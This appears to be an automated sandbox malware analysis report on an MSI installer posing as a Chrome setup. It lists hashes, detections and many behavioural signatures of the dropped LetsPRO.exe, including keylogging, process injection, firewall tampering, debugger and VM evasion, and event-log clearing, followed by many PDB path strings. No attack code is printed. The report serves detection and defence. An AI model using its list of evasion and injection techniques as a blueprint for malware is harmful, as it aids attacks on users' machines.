Windows Analysis Report
sutup-Chrome.13.26.x64.msi

Overview

General Information

Sample name: sutup-Chrome.13.26.x64.msi
Analysis ID: 1432094
MD5: 86561e111e7ce97e13a9936b9b4ba849
SHA1: 61cd40da9253a367e416c9ab67e73738f18948c3
SHA256: bd462515ea9ffe66fc27d9baa0fcc4bf733385829c2fc5676129aaeeb2e0af88
Tags: msiSilverFox
Infos:

Detection

BlackMoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected BlackMoon Ransomware
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates files in the system32 config directory
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Machine Learning detection for dropped file
Modifies the windows firewall
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Tries to evade analysis by execution special instruction (VM detection)
Uses netsh to modify the Windows network and firewall settings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Avira: detection malicious, Label: HEUR/AGEN.1362051
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Virustotal: Detection: 16% Perma Link
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD5AE04 CryptHashCertificate, 30_2_6CD5AE04
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD37604 CryptUnprotectData,GetLastError,LocalFree, 30_2_6CD37604
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD5B004 CryptQueryObject,CertFindCertificateInStore,CertFindCertificateInStore,CertCloseStore, 30_2_6CD5B004
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCD8ED8 CryptProtectData,LocalFree, 30_2_6CCD8ED8
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD59D9B CryptHashData, 30_2_6CD59D9B
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDC1DA5 CryptAcquireContextW,GetLastError,CryptReleaseContext, 30_2_6CDC1DA5
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD59E01 CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey, 30_2_6CD59E01
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CCDD933 CryptReleaseContext,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext, 30_2_6CCDD933
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CD59BDC CryptDecodeObjectEx,CryptImportPublicKeyInfo,CryptCreateHash, 30_2_6CD59BDC
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File opened: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\MSVCR100.dll Jump to behavior
Source: Binary string: GoogleUpdateCore_unsigned.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
Source: Binary string: TEST_goopdateres_unsigned_fa.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115530845.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115399882.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fa.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*L source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .\Device\HarddiskVolume3 Settings\Temp\Symbols\winload_prod.pdb\*.*.*er Data\GraphiteDawnCache\LetsPRO.exeRO.exexeeS/- source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_lt.pdb source: goopdateres_lt.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_el.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112147856.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112233722.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_mr.pdb source: goopdateres_mr.dll.16.dr
Source: Binary string: cation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDB source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_bg.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108527594.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108636154.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bg.dll.30.dr, goopdateres_bg.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*@ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ar.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108359018.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108248224.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ar.dll.16.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb@ source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
Source: Binary string: TEST_goopdateres_unsigned_de.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111761457.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111581042.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_gu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117478429.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117258835.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_gu.dll.16.dr
Source: Binary string: TEST_mi_exe_stub.pdb source: ChromeSetup.exe, 00000010.00000002.3261124780.0000000000029000.00000002.00000001.01000000.00000005.sdmp, ChromeSetup.exe, 00000010.00000000.2019739468.0000000000029000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2{ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\" source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_psmachine_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_es-419.pdb source: GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114195324.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114065318.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es-419.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_sl.pdb source: goopdateres_sl.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_pl.pdb source: goopdateres_pl.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_is.pdb source: GoogleUpdate.exe, 0000001E.00000003.2121928783.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2121282363.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_is.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_th.pdb source: goopdateres_th.dll.30.dr
Source: Binary string: GoogleCrashHandler_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_bn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110156700.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108884160.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, goopdateres_bn.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_en.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112625418.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112537399.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ko.pdb source: GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2133014724.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2132719778.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_ko.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_zh-TW.pdb source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008BF000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ca.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110685243.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110803785.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdate_unsigned.pdb source: ChromeSetup.exe, 00000010.00000003.2040369150.0000000002622000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2052523168.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, GoogleUpdate.exe, 0000001E.00000002.3261001713.0000000000121000.00000020.00000001.01000000.00000008.sdmp, GoogleUpdate.exe.30.dr, GoogleUpdate.exe.16.dr
Source: Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169446695.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169122915.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateBroker.exe.16.dr, GoogleUpdateBroker.exe.30.dr
Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: LetsPRO.exe, 00000008.00000002.2082649111.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000008.00000000.2016836584.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000002.2085508018.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000009.00000000.2017338659.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000002.2085509347.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000A.00000000.2017352894.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000000.2017959585.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000B.00000002.2081423718.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000002.2179702546.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 0000000C.00000000.2021432146.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000000.2030073468.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000016.00000002.2096564571.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000002.2101128457.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000017.00000000.2028409698.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000002.2090627708.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000018.00000000.2028772226.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000000.2028783611.000000000026D000.00000002.00000001.01000000.00000004.sdmp, LetsPRO.exe, 00000019.00000002.2090626641.000000000026D000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056h& source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_pt-PT.pdb source: goopdateres_pt-PT.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_am.pdb source: GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107956002.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2108069440.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_am.dll.30.dr
Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleCrashHandler_unsigned.pdbp source: ChromeSetup.exe, 00000010.00000003.2027981096.0000000002623000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105240305.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105347760.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105264031.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler.exe.30.dr
Source: Binary string: TEST_goopdateres_unsigned_cs.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111107544.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_cs.dll.16.dr
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*u source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*sC source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_da.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111407957.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_iw.pdb source: GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127845823.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ja.pdb source: GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2130517355.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_psuser_unsigned_64.pdbF source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_et.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115013262.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_et.dll.30.dr
Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\LetsPRO.execation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2231954101.0000000000624000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4876bf7-244b-4c34-87a7-98ddf5c5224d}\*.*ecation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exern source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdbR source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ons\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B784 source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
Source: Binary string: TEST_goopdateres_unsigned_hr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118651881.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hr.dll.16.dr
Source: Binary string: TEST_psuser_unsigned_64.pdb source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4 source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_hi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118068933.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exeU source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2170069383.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169861546.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateOnDemand.exe.30.dr, GoogleUpdateOnDemand.exe.16.dr
Source: Binary string: 785491~1.LOCntkrnlmp.pdb5x source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdate_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5r source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
Source: Binary string: TEST_goopdateres_unsigned_ms.pdb source: goopdateres_ms.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_fr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116824716.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fr.dll.30.dr
